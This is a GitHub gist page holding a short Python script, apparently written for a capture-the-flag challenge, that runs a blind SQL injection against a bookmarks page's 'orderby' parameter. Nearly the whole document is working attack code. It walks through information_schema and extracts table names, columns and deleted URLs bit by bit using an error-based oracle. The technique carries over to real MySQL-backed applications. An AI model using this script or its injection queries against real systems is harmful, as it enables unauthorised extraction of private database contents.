Instantly share code, notes, and snippets.

anonymous /bitcoinctf_explot.py Secret
Created May 4, 2013

Embed
What would you like to do?
import requests
import string
import sys
url = "http://www.bitcoinctf.com/"
page = "b00kmarks.php?orderby=(%s)&limit=1"
# Table names
# query = "(select 1 from (select table_name from information_schema.tables limit %s,1) a where (ord(substring(a.table_name, %s, 1)) %s26 %s) = %s union all select 1)"
# Table schema
# query = "(select 1 from (select distinct table_schema from information_schema.tables limit %s,1) a where (ord(substring(a.table_schema, %s, 1)) %s26 %s) = %s union all select 1)"
# Column names
# query = "(select 1 from (select distinct column_name from information_schema.columns where table_name = 'urls' and table_schema = 'bookmark' limit %s,1) a where (ord(substring(a.column_name, %s, 1)) %s26 %s) = %s union all select 1)"
# Bookmarks
query = "(select 1 from (select distinct url from bookmark.urls where deleted = 1 limit %s,1) a where (ord(substring(a.url, %s, 1)) %s26 %s) = %s union all select 1)"
#query = "(select 1 from (select distinct addedby from bookmark.urls where deleted = 1 limit %s,1) a where (ord(substring(a.addedby, %s, 1)) %s26 %s) = %s union all select 1)"
#for i in range(0, 99):
i = 0
for j in range(1, 18):
value = 0
for c in range(8):
exp = 2**c
response = requests.get(url + page % (query % (i, j, '%', exp, exp)))
if response.text[:7] == "Unknown":
value += exp
if value == 0:
print "END"
break
print chr(value)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment